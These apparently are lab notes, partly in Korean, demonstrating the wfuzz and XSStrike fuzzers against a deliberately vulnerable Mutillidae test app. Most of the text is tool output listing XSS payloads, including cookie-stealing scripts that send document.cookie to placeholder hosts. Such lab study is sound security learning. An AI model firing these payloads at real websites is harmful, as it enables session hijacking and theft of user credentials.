wfuzz
Wfuzz is another popular tool used to fuzz applications not only for XSS vulnerabilities, but also SQL injections, hidden directories, form parameters, and more. It is included in Kali by default.
Example
Using wordlist
wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/XSS.txt http://172.16.1.102/mutillidae/index.php?page=FUZZ
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.2.11 - The Web Fuzzer *
********************************************************
Target: http://172.16.1.102/mutillidae/index.php?page=FUZZ
Total requests: 39
==================================================================
ID Response Lines Word Chars Payload
==================================================================
000020: C=200 514 L 1425 W 21898 Ch "<IMG%20SRC=`javascript:alert("'WXSS'")`>"
000019: C=200 514 L 1425 W 21812 Ch "<IMG%20SRC=javascript:alert("WXSS")>"
000021: C=200 514 L 1425 W 21983 Ch "<IMG%20"""><SCRIPT>alert("WXSS")</SCRIPT>">"
000001: C=200 514 L 1420 W 21769 Ch ""><script>""
000003: C=200 514 L 1420 W 21907 Ch "<<script>alert("WXSS");//<</script>"
000016: C=200 514 L 1425 W 21877 Ch "<IMG%20SRC="javascript:alert('WXSS')""
000015: C=200 514 L 1425 W 21893 Ch "<IMG%20SRC="javascript:alert('WXSS');">"
000002: C=200 514 L 1420 W 21870 Ch "<script>alert("WXSS")</script>"
000018: C=200 514 L 1425 W 21858 Ch "<IMG%20SRC=JaVaScRiPt:alert('WXSS')>"
000017: C=200 514 L 1425 W 21858 Ch "<IMG%20SRC=javascript:alert('WXSS')>"
000022: C=200 514 L 1425 W 21973 Ch "<IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))>"
000023: C=200 514 L 1425 W 21762 Ch "<IMG%20SRC='javasc ript:alert(document.cookie)'>"
000024: C=200 514 L 1425 W 21757 Ch "<IMG%20SRC="jav ascript:alert('WXSS');">"
000025: C=200 514 L 1425 W 21757 Ch "<IMG%20SRC="jav	ascript:alert('WXSS');">"
000027: C=200 514 L 1425 W 21757 Ch "<IMG%20SRC="jav
ascript:alert('WXSS');">"
000030: C=200 514 L 1425 W 21903 Ch "<IMG%20LOWSRC="javascript:alert('WXSS')">"
000029: C=200 514 L 1425 W 21903 Ch "<IMG%20DYNSRC="javascript:alert('WXSS')">"
000026: C=200 514 L 1425 W 21757 Ch "<IMG%20SRC="jav
ascript:alert('WXSS');">"
000028: C=200 514 L 1430 W 21747 Ch "<IMG%20SRC="%20%20javascript:alert('WXSS');">"
000031: C=200 514 L 1425 W 22060 Ch "<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>"
000032: C=200 514 L 1425 W 21727 Ch "<IMG%20SRC=javascript:alert('XSS')>"
000033: C=200 514 L 1425 W 21727 Ch "<IMG%20SRC=javascript:alert('XSS')>"
000034: C=200 514 L 1425 W 21727 Ch "<IMG%20SRC=javascript:alert('XSS')>"
000036: C=200 514 L 1425 W 22191 Ch ""><script>document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie</script>"
000037: C=200 514 L 1425 W 22196 Ch "%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E"
000035: C=200 514 L 1425 W 21950 Ch "'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E"
000039: C=200 514 L 1420 W 21763 Ch "'';!--"<XSS>=&{()}"
000038: C=200 514 L 1420 W 22883 Ch "';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}"
000005: C=200 514 L 1420 W 21911 Ch "'><script>alert(document.cookie)</script>"
000004: C=200 514 L 1420 W 21895 Ch "<script>alert(document.cookie)</script>"
000006: C=200 514 L 1420 W 21916 Ch "'><script>alert(document.cookie);</script>"
000007: C=200 514 L 1420 W 21776 Ch "\";alert('XSS');//"
000008: C=200 514 L 1420 W 21875 Ch "%3cscript%3ealert("WXSS");%3c/script%3e"
000009: C=200 514 L 1420 W 21900 Ch "%3cscript%3ealert(document.cookie);%3c%2fscript%3e"
000010: C=200 514 L 1425 W 21875 Ch "%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E"
000011: C=200 563 L 1570 W 24175 Ch "<script>alert(document.cookie);</script>"
000012: C=200 563 L 1570 W 24175 Ch "<script>alert(document.cookie);<script>alert"
000013: C=200 514 L 1420 W 21964 Ch "<xss><script>alert('WXSS')</script></vulnerable>"
000014: C=200 514 L 1425 W 21913 Ch "<IMG%20SRC='javascript:alert(document.cookie)'>"Using encoder
페이로드에 URL 인코딩 적용 예시
wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/XSS.txt,urlencode http://172.16.1.102/mutillidae/index.php?page=FUZZ
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.2.11 - The Web Fuzzer *
********************************************************
Target: http://172.16.1.102/mutillidae/index.php?page=FUZZ
Total requests: 39
==================================================================
ID Response Lines Word Chars Payload
==================================================================
000003: C=200 514 L 1420 W 21907 Ch "%3C%3Cscript%3Ealert%28%22WXSS%22%29%3B//%3C%3C/script%3E"
000002: C=200 514 L 1420 W 21870 Ch "%3Cscript%3Ealert%28%22WXSS%22%29%3C/script%3E"
000001: C=200 514 L 1420 W 21769 Ch "%22%3E%3Cscript%3E%22"
000007: C=200 514 L 1420 W 21776 Ch "%5C%22%3Balert%28%27XSS%27%29%3B//"
000005: C=200 514 L 1420 W 21911 Ch "%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E"
000009: C=200 514 L 1420 W 21926 Ch "%253cscript%253ealert%28document.cookie%29%3B%253c%252fscript%253e"
000008: C=200 514 L 1420 W 21891 Ch "%253cscript%253ealert%28%22WXSS%22%29%3B%253c/script%253e"
000004: C=200 514 L 1420 W 21895 Ch "%3Cscript%3Ealert%28document.cookie%29%3C/script%3E"
000010: C=200 514 L 1420 W 21901 Ch "%253Cscript%253Ealert%28%2522X%2520SS%2522%29%3B%253C/script%253E"
000006: C=200 514 L 1420 W 21916 Ch "%27%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C/script%3E"
000011: C=200 514 L 1420 W 21924 Ch "%26ltscript%26gtalert%28document.cookie%29%3B%3C/script%3E"
000015: C=200 514 L 1420 W 21903 Ch "%3CIMG%2520SRC%3D%22javascript%3Aalert%28%27WXSS%27%29%3B%22%3E"
000012: C=200 514 L 1420 W 21968 Ch "%26ltscript%26gtalert%28document.cookie%29%3B%26ltscript%26gtalert"
000014: C=200 514 L 1420 W 21923 Ch "%3CIMG%2520SRC%3D%27javascript%3Aalert%28document.cookie%29%27%3E"
000019: C=200 514 L 1420 W 21934 Ch "%3CIMG%2520SRC%3Djavascript%3Aalert%28%26quot%3BWXSS%26quot%3B%29%3E"
000013: C=200 514 L 1420 W 21964 Ch "%3Cxss%3E%3Cscript%3Ealert%28%27WXSS%27%29%3C/script%3E%3C/vulnerable%3E"
000016: C=200 514 L 1420 W 21887 Ch "%3CIMG%2520SRC%3D%22javascript%3Aalert%28%27WXSS%27%29%22"
000017: C=200 514 L 1420 W 21868 Ch "%3CIMG%2520SRC%3Djavascript%3Aalert%28%27WXSS%27%29%3E"
000018: C=200 514 L 1420 W 21868 Ch "%3CIMG%2520SRC%3DJaVaScRiPt%3Aalert%28%27WXSS%27%29%3E"
000020: C=200 514 L 1420 W 21908 Ch "%3CIMG%2520SRC%3D%60javascript%3Aalert%28%22%27WXSS%27%22%29%60%3E"
000022: C=200 514 L 1420 W 21983 Ch "%3CIMG%2520SRC%3Djavascript%3Aalert%28String.fromCharCode%2888%2C83%2C83%29%29%3E"
000021: C=200 514 L 1420 W 21993 Ch "%3CIMG%2520%22%22%22%3E%3CSCRIPT%3Ealert%28%22WXSS%22%29%3C/SCRIPT%3E%22%3E"
000023: C=200 514 L 1425 W 21928 Ch "%3CIMG%2520SRC%3D%27javasc%09ript%3Aalert%28document.cookie%29%27%3E"
000025: C=200 514 L 1420 W 21941 Ch "%3CIMG%2520SRC%3D%22jav%26%23x09%3Bascript%3Aalert%28%27WXSS%27%29%3B%22%3E"
000024: C=200 514 L 1425 W 21908 Ch "%3CIMG%2520SRC%3D%22jav%09ascript%3Aalert%28%27WXSS%27%29%3B%22%3E"
000028: C=200 514 L 1420 W 21966 Ch "%3CIMG%2520SRC%3D%22%2520%26%2314%3B%2520javascript%3Aalert%28%27WXSS%27%29%3B%22%3E"
000027: C=200 514 L 1420 W 21941 Ch "%3CIMG%2520SRC%3D%22jav%26%23x0D%3Bascript%3Aalert%28%27WXSS%27%29%3B%22%3E"
000030: C=200 514 L 1420 W 21913 Ch "%3CIMG%2520LOWSRC%3D%22javascript%3Aalert%28%27WXSS%27%29%22%3E"
000026: C=200 514 L 1420 W 21941 Ch "%3CIMG%2520SRC%3D%22jav%26%23x0A%3Bascript%3Aalert%28%27WXSS%27%29%3B%22%3E"
000029: C=200 514 L 1420 W 21913 Ch "%3CIMG%2520DYNSRC%3D%22javascript%3Aalert%28%27WXSS%27%29%22%3E"
000031: C=200 514 L 1420 W 22118 Ch "%3CIMG%2520SRC%3D%27%2526%2523x6a%3Bavasc%2526%2523000010ript%3Aa%2526%2523x6c%3Bert%28document.%2526%2523x63%3Bookie%29%27%3E"
000032: C=200 514 L 1420 W 22562 Ch "%3CIMG%2520SRC%3D%26%23106%3B%26%2397%3B%26%23118%3B%26%2397%3B%26%23115%3B%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B%26%23116%3B%26%2358%3B%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B%26%2340%3B%26%2339%3B%26%2388%3B%26%2383%3B%26%2383%3B%26%2339%3B%26%2341%3B%3E"
000033: C=200 514 L 1420 W 22967 Ch "%3CIMG%2520SRC%3D%26%230000106%26%230000097%26%230000118%26%230000097%26%230000115%26%230000099%26%230000114%26%230000105%26%230000112%26%230000116%26%230000058%26%230000097%26%230000108%26%230000101%26%230000114%26%230000116%26%230000040%26%230000039%26%230000088%26%230000083%26%230000083%26%230000039%26%230000041%3E"
000035: C=200 514 L 1420 W 21996 Ch "%27%253CIFRAME%2520SRC%3Djavascript%3Aalert%28%252527XSS%252527%29%253E%253C/IFRAME%253E"
000034: C=200 514 L 1420 W 22507 Ch "%3CIMG%2520SRC%3D%26%23x6A%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74%26%23x3A%26%23x61%26%23x6C%26%23x65%26%23x72%26%23x74%26%23x28%26%23x27%26%23x58%26%23x53%26%23x53%26%23x27%26%23x29%3E"
000036: C=200 514 L 1420 W 22191 Ch "%22%3E%3Cscript%3Edocument.location%3D%27http%3A//cookieStealer/cgi-bin/cookie.cgi%3F%27%2Bdocument.cookie%3C/script%3E"
000037: C=200 514 L 1420 W 22396 Ch "%2522%253E%253Cscript%253Edocument%252Elocation%253D%2527http%253A%252F%252Fyour%252Esite%252Ecom%252Fcgi%252Dbin%252Fcookie%252Ecgi%253F%2527%2520%252Bdocument%252Ecookie%253C%252Fscript%253E"
000038: C=200 514 L 1420 W 22906 Ch "%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29//%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29//%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29//%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29//%3E%3C/SCRIPT%3E%21--%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C/SCRIPT%3E%3D%26%7B%7D"
000039: C=200 514 L 1420 W 21796 Ch "%27%27%3B%21--%22%3CXSS%3E%3D%26%7B%28%29%7D"
Total time: 27.33954
Processed Requests: 39
Filtered Requests: 0
Requests/sec.: 1.426505XSSstrike
dedicated suite for detecting cross-site scripting vulnerabilities that includes an intelligent payload generator, a fuzzer, a crawler, WAF detection, and more. XSStrike is currently in beta.
help
git 페이지에 잘 나와있다.
Examples
python3 xsstrike.py -u http://172.16.1.102/mutillidae/index.php?page=dns-lookup.php
XSStrike v3.0-beta
[~] Checking for DOM vulnerabilities
------------------------------------------------------------
52 //document.getElementById("idSystemInformationHeading").innerHTML = l_loginMessage;
53 document.getElementById("idHintsStatusHeading").innerHTML = 'Hints: ' + l_hintsStatus;
54 document.getElementById("idSecurityLevelHeading").innerHTML = 'Security Level: ' + l_securityLevel + ' (' + l_securityLevelDescription + ')';
446 Google Hacking Database
495 <a onclick="document.location.href='';"
584 window.localStorage.setItem("LocalStorageTarget","This is set by the index.php page");
585 window.sessionStorage.setItem("SessionStorageTarget","This is set by the index.php page");
------------------------------------------------------------
[+] Potentially vulnerable objects found
[+] WAF Status: Offline
[!] Testing parameter: page
[!] Reflections found: 4
[~] Analysing reflections
[~] Generating payloads
[!] Payloads generated: 9256
------------------------------------------------------------
[+] Payload: "><A%0aoNMOUseoveR%0d=%0d(confirm)() x>z
[!] Efficiency: 100
[!] Cofidence: 10
[?] Would you like to continue scanning? [y/N]